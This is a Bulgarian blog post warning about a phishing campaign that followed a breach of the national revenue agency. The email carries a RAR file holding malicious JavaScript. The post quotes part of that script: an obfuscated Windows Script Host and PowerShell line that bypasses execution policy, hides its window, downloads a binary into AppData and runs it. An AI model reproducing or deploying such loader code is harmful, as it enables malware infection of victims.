Потребителски вход

Запомни ме | Регистрация
Постинг
07.10.2016 22:24 - Поредния пробив в базата на НАП
Автор: akrachev Категория: Технологии   
Прочетен: 333 Коментари: 0 Гласове:
1


Постингът е бил сред най-популярни в категория в Blog.bg
 Тъй като не гледам телевизия, не разбрах своевременно, че е имало пробив тези дни в системата на НАП и са били изтеглени данни на респондентите, та ми се наложи на практика да се запозная със случая.

Въпросните хакери след като за изтеглили електронните адреси, изпращат към тях писма със заглавие "Уведомление относно промени в регламента за подаване на декларации към НАП"  и подател Национална агенция за приходите

В писмото има прикачен файл известие_432439.rar, което разбира се съдържа Windows scripting host зловреден код. Дано всички счетоводители да гледат телевизия и да са спокойни, когато са получили писмото. 

Аз лично като видях .js файла в RAR архива си помислих, че вероятно ще тегли софтуер от НАП. Чак като се зачетох вътре и видях "var soghax = WScript.CreateObject("WScRIPt.SHEll");
if (typeof scyqwy() == "number") { var zexofhimq = "CMd.Exe /c " + mhymukod + " -eXecu^TIo^N^poli^cy^ BYpasS  -N^o^prOfi^lE^     -w^indOW^s^tyLe   ^h^iDDen^ (NEW^-ObJEcT    ^S^y^STEM^.N^et^.w^e^b^cl^Ien^T).^do^wn^lOADfile(^"" + zxytu + "c.bin" + "","%ApPdaTa%.EXE");sTaRT-pR^o^CE^s^S "%AppdATA%.eXe""; "
разбрах, че нещо не е наред...







Гласувай:
1
0



Няма коментари
Търсене

За този блог
Автор: akrachev
Категория: Лични дневници
Прочетен: 209538
Постинги: 164
Коментари: 53
Гласове: 71
Календар
«  Април, 2018  
ПВСЧПСН
1
2345678
9101112131415
16171819202122
23242526272829
30